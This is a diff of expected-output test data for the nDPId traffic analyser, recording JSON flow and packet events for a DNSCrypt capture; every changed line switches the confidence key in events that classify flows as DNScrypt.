00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":548,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400460,"flow_last_seen":946739400460,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739400460,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":47971,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02428{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":548,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":222,"flow_packet_id":1,"flow_last_seen":946739400460,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739400460,"pkt":"REREREREZmZmZmZmCABFAAXcPTcgAH4R32cKAAABucF\/9LtjAbsGBL9j\/IoBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAl5b2Zpamktc2UAABAAAQAAAAAAAAAAAAXGAAwFwgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":548,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400460,"flow_last_seen":946739400460,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739400460,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":47971,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":548,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400460,"flow_last_seen":946739400460,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739400460,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":47971,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":549,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739400460} 00421{"packet_event_id":1,"packet_event_name":"packet","packet_id":549,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739400460,"pkt":"REREREREZmZmZmZmCABFAABQPTcAuX4RBDsKAAABucF\/9AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":550,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739400460} @@ -1116,26 +1116,26 @@ 00702{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":555,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":222,"flow_packet_id":2,"flow_last_seen":946739400522,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":222,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":222,"pkt_l4_len":188,"thread_ts_msec":946739400522,"pkt":"ZmZmZmZmRERERERECABFAADQoaxAADYRp\/65wX\/0CgAAAQG7u2MAvNXc\/IqBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAl5b2Zpamktc2UAABAAAcAMABAAAQAAcIAAfXxETlNDAAIAANT+QyCeqOpvY3ek9vOTVGrWy3oc27D9SS491oCJRe7RQWKb3q0aPb33Ziq0RP9PPCzRMBy1lW3l6rz74jWgmwszJtIbCS+4i64Fme9c0vB4hxz+sKp41i8d9KRbhVFMbjMm0hsJL7iLAAAAAV9TV8BfVKlA"} 00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":556,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400522,"flow_last_seen":946739400522,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739400522,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":49568,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":556,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":223,"flow_packet_id":1,"flow_last_seen":946739400522,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739400522,"pkt":"REREREREZmZmZmZmCABFAAIcaQhAAH4RLuEKAAABTUJU6cGgAbsCCGUBsp4BAAABAAAAAAABATINZG5zY3J5cHQtY2VydAlyZXNvbHZlcjIIZG5zY3J5cHQCZXUAABAAAQAAAAAAAAAAAAG+AAwBugAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":556,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400522,"flow_last_seen":946739400522,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739400522,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":49568,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":556,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400522,"flow_last_seen":946739400522,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739400522,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":49568,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":557,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400522,"flow_last_seen":946739400522,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739400522,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":46140,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":557,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":224,"flow_packet_id":1,"flow_last_seen":946739400522,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739400522,"pkt":"REREREREZmZmZmZmCABFAAIcaQlAAH4RLuAKAAABTUJU6bQ8AbsCCGUBspoBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAlyZXNvbHZlcjIIZG5zY3J5cHQCZXUAABAAAQAAAAAAAAAAAAG+AAwBugAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":557,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400522,"flow_last_seen":946739400522,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739400522,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":46140,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":557,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400522,"flow_last_seen":946739400522,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739400522,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":46140,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00605{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":558,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400522,"flow_last_seen":946739400522,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739400522,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":40209,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":558,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":225,"flow_packet_id":1,"flow_last_seen":946739400522,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739400522,"pkt":"REREREREZmZmZmZmCABFAAXcaQogAH4RSx8KAAABTUJU6Z0RAbsGBIoKspkBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAlyZXNvbHZlcjIIZG5zY3J5cHQCZXUAABAAAQAAAAAAAAAAAAW6AAwFtgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":558,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400522,"flow_last_seen":946739400522,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739400522,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":40209,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":558,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400522,"flow_last_seen":946739400522,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739400522,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":40209,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":559,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400522,"flow_last_seen":946739400522,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739400522,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":49732,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":559,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":226,"flow_packet_id":1,"flow_last_seen":946739400522,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739400522,"pkt":"REREREREZmZmZmZmCABFAAIcaQtAAH4RLt4KAAABTUJU6cJEAbsCCGUBspwBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAlyZXNvbHZlcjIIZG5zY3J5cHQCZXUAABAAAQAAAAAAAAAAAAG+AAwBugAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":559,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400522,"flow_last_seen":946739400522,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739400522,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":49732,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":559,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400522,"flow_last_seen":946739400522,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739400522,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":49732,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":560,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739400522} 00421{"packet_event_id":1,"packet_event_name":"packet","packet_id":560,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739400522,"pkt":"REREREREZmZmZmZmCABFAABQaQoAuX4Rb\/IKAAABTUJU6QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00605{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":561,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400522,"flow_last_seen":946739400522,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739400522,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":50757,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":561,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":227,"flow_packet_id":1,"flow_last_seen":946739400522,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739400522,"pkt":"REREREREZmZmZmZmCABFAAXcaQwgAH4RSx0KAAABTUJU6cZFAbsGBGDUspsBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAlyZXNvbHZlcjIIZG5zY3J5cHQCZXUAABAAAQAAAAAAAAAAAAW6AAwFtgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA